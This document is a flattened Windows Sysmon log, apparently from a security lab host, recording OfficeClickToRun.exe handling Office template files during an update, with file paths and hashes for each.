Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\QuizShow.potxMD5=D7BE82228AF15500B3F6C4EBF6519ADE,SHA256=31B187069894C07117CBEBAC8F3A0F2EAC908E90FA79F740D62ACBD04F730CFC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070539Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.235{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\Pitchbook.potxMD5=1F7ED3D47AA23E97C556AA35E7F23C27,SHA256=B717F65411AC9E26FCCB41D3229C1C49F8A73DF78EF1C5BB8B8A8F090ADBC936,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070538Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.235{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\PersonalMonthlyBudget.xltxMD5=B130EA91B066EB60869D23157EC9EE8B,SHA256=DA9E7C5E1E487F52192AA15BBD8E6782F5D91CDBD080776FC441CFCE3FC41EFC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070537Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\OriginResume.DotxMD5=AC597B25FD8DD43EDB85756372612454,SHA256=B6966CBF3406E4AC228422CFE96F1BB2D4393657AFC0F1C825B22C7FFF6DE4F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070536Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\OriginReport.DotxMD5=E717031A969928A6EFB2AEC4E192F91E,SHA256=4CD643178C58606C7FFEF180718098BB5B4F1C53F7D8B4F012BB58E6E3491D33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070535Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\OriginLetter.DotxMD5=EBAC913F422FE9D4BEFE805B35CD69F7,SHA256=AACFA286A06E6BDE809E1CC978DAFCD0F0A8152DD8F0393BD0DCDDCB6562F7AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070534Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\Office Word 2003 Look.dotxMD5=1E239237CBE20F92710C652BFB0B1545,SHA256=29055B9EC899281C7D9FC74B9AD38CCE6657D8FE797D026622C3737BDD31A194,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070533Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\MAIL.OFTMD5=AAF5B5326CBC3397A943A1484E502893,SHA256=72A7C1CF7081B36949737761E83CA37C06D22F8731DBF117FC5A3FD2526E8958,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070532Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\LoanAmortization.xltxMD5=9A7A1B52AF5EB4F872A2E8BDB3F24F8B,SHA256=754118AF18E2C4E6E672FD5D067467C59026576573892FD40CF6E1050DD4A057,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070531Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.204{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\ExpenseReport.xltxMD5=4027E34E8278D65D7D7816038FC78AE0,SHA256=442992542E5BB38B0EEE35534D2ECCAC5FCB283ECCB88512A04EDB1AA4F8F551,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070530Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.204{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\EssentialResume.dotxMD5=52272DA889EB0009CA6621C0C4ADBD37,SHA256=4FE15E621FAED617E60C6C54844CD48E476A9874DF4EF11FB7A2CEB8AF98AB98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070529Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.204{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\EssentialReport.dotxMD5=6E0F270CF2332EC84DCA2E1938B16461,SHA256=9F72157DCEC18501B152850DC94B4B54849520E3CAF5277B714F8EEBA77AA774,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070528Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.188{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\EssentialLetter.dotxMD5=1E35375DAD5939F95D66109AE855C942,SHA256=FDDA025ADEE441FD2A833ACEA54B13159F26A5523F7487F6E035F6E2DF4164EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070527Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.188{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\ContemporaryPhotoAlbum.potxMD5=0A6AF9FAE53C120D2A7A6DDB5DF01C81,SHA256=445246062A9C3AA7426B54ADF6F92A9CD3E27E2E3163D7EE49FB38873D2F43C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070526Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\ClassicPhotoAlbum.potxMD5=1AA0424959027CCD90A951BF6897D79C,SHA256=240D04118A31C15211BCACC0B05E0C29CB5F6361007B067ECFE3F5EC7698E6D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070525Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.157{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\ChronologicalResume.dotxMD5=91762855297F8B970C658442E73A2842,SHA256=C5A5F672E68F0AF008AB319361531B66469BA48EC914F7DA6CEB879608656944,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070524Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.157{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\ChronologicalLetter.dotxMD5=817FE47C4A024E9F86A5E7F3E330F917,SHA256=2BFB02992073595D904AE3739DFEA75D45BECBFA31FBB01EBD1F6D83EDA823A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070523Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.157{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\BloodPressureTracker.xltxMD5=8984147F3276D4A8A47AE57377A344ED,SHA256=C978CFCDBEC683C804DC77D5D7487912D1536DCCA79FDA56CBC21CBBA3AB4D39,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070522Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.157{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\Blog.dotxMD5=9EB9F3280FBE22000627600198CC3226,SHA256=9991188FAF9393744973F58E9610A16502D7EFD5E9FCBE6C1D7C248C8A927E23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070521Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.157{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\BillingStatement.xltxMD5=AA968A010F67E531491EDCD50791F5F0,SHA256=7E20E3E8BA071D9FD09CB0CE5F3C99A594F0962E0475C4D4D26B0193FE44148D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070520Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.157{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\ApothecaryResume.dotxMD5=8447AC806C29E3F1CD6552BE8B002FC1,SHA256=B09821F907CC7DA7C8A06EE80C0B19E40DB6C51409D10FB6BAE0D023FA22ACDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070519Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\ApothecaryNewsletter.dotxMD5=BFA9DF30BF82E06A267678AFAA422DE1,SHA256=0FB1A6D7DC1CBA2276ACD00CE267ACABE119E425BE1670002923F950CDB4BC91,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070518Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\ApothecaryLetter.dotxMD5=426C6B00DCAB8093DA4D85291E41023E,SHA256=1BA826BD7FC21D7F027CD183D02C9512B80FD4EE07923E84CF5200AB58B04504,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070517Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\AdjacencyResume.dotxMD5=33321E5E6B8C6F9B5388A9481F9AC1B8,SHA256=1C4BA7E768734E6C06B0310F0106F6588CEFB0710259B15E94841E9096A56EED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070516Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\AdjacencyReport.dotxMD5=3182DBA17A814B72E35A9B6D5BA47F40,SHA256=DAA134ACC2DD76EE7A6CD7CDC6CB206A1D637FF67C78973EA24B19992665DA70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070515Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\AdjacencyLetter.dotxMD5=76991653D1A7B6D829086F6EF9DEB0BD,SHA256=5FC72CE094AA191A9CB86E4CEFDDE9E5DED1A18BF2D463856B34CB10C8E6E1CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070514Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\ONENOTE\16\Stationery\PLANNERS.ONEMD5=9DAC60ECD44418EA3509C27AA8D51A15,SHA256=EAF14134A1A9FA38F56BD6B3C9480CAA4BF2256F8A6F1C314249F2A8AD484E94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070513Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.079{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\ONENOTE\16\Stationery\DESIGNER.ONEMD5=FB5D6F40010DCA83B640B5E27DE7CDE3,SHA256=5CFE30EB23F0F48CB09D6495D98174B2EF1EA6E042C9215F0A40131530C0D3DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070512Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\ONENOTE\16\Stationery\BUSINESS.ONEMD5=424F5E056E3CDC9E41913A8A4335C991,SHA256=0F3A0BC2885CFC4E3D817E867911B4885F29B0B5A71FC7D6A61DD21BDD524A65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070511Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\ONENOTE\16\Stationery\BLANK.ONEMD5=3348C2B7753249CEF8908F14D2C589AD,SHA256=8DCBA82F583CD44474F82C85E1A83D3C0E991332B236F5FBEC0E4731800805D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070510Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.032{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\ONENOTE\16\Stationery\ACADEMIC.ONEMD5=0918A08CC2C4492B84965F5AD24012D3,SHA256=8653262927F311F3195925368ACFD739E57E19093AAE98762BC9EA5E1F211638,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070509Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.032{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\GettingStarted16\SLINTL.DLLMD5=58E66BEE62FA133CD1EBF1148119D899,SHA256=193AE01BF95CADB1A9DB1E0D475C731A0E9142413CF04D136BD860D6FC264B2C,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070508Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.032{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\Access\accessparts.xmlMD5=9D5FE483F69E44C87DE15DC0C8C1A8FE,SHA256=4F2D5CE7123FD3183EBCA7D239054464EB5AECAC32F8D0F8C5A4D980C4807E8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070507Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\Access\Part\Users.accdtMD5=9CACD96493CBDEE2D06F10E8783BE360,SHA256=83E0D5414330BB74FA05A5D2788697E997082629EA451E30020DFD5AAB1515EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070506Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\Access\Part\Tasks.accdtMD5=DAC563D20AC0EF78872666332D62E20E,SHA256=F6098B258E8BCF78A1D92256C117AC602DC365D450D256E369764E1E052A01CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070505Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\Access\Part\Tabs.accdtMD5=ACA652B364D3E5BDDF6465E77C57D3E7,SHA256=2241B0CD80FA64F9B957A23F5C24D0A016E6F2ED8F261ACE68FBE9C6DE06BC2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070504Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\Access\Part\Msgbox.accdtMD5=E122E18543ED524B7212A0E89F9DB6BD,SHA256=4C75E65D0643FEE511072BA8FDDC79663C94D32054D59C24200BE0B07607DDEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070503Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\Access\Part\Media.accdtMD5=B961EE75B87C3F4B69B0F7F247B94853,SHA256=9E3F25EE03140CE66A0F7A84F9D589621214F0B40BA11DEF2D395A026952843B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070502Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\Access\Part\List.accdtMD5=319E9D5409740A957662C9488A9A25D5,SHA256=25C3E4EA40A38D77C9799B50EEE2D114B3FFB980690DF9EF0B788B7808BA4389,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070501Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\Access\Part\Issues.accdtMD5=DE7AEA16302215AA08ADB0D2A4DA9106,SHA256=8B14365D5A471C41B1EF81A93EB6A6AFE2CCF7795C53ACF925FA8C75BD77394F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070500Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\Access\Part\Dialog.accdtMD5=6E894AEB61721CFAA245CD7803E70D50,SHA256=A7B5767F61C2CE8E6DFBC9A77F40FEA2143EB965897EF010C98089B089CB5F99,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070499Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\Access\Part\Details.accdtMD5=7E4D8479A0FC95EDF5AC8AAD2C87147B,SHA256=9A48BDFABFCC5A5EAAF96C82C526CBD07996E87F7EF69DE8BDF1ABA3F1077084,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070498Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\Access\Part\Contacts.accdtMD5=2C7E99EBFFBCD18A573C6D9257050320,SHA256=56796F0A12D8DD9469FB911B34A6DDC8F666A4F00817780B98D188C6FF724B6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070497Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\Access\Part\Comments.accdtMD5=7E167F79A81ABD088FE679EDF489C311,SHA256=1B91501E62205EA14D217E985514BF99A3B32AFFDE6015590A699DC435E76853,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070496Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\Access\Part\2 Top.accdtMD5=385B5EA13B97DB19D7F19C0E92DA7011,SHA256=3566F662375C9B0EA110455CA6AB77F53F8C656884770B954B3975D622CF47E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070495Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft 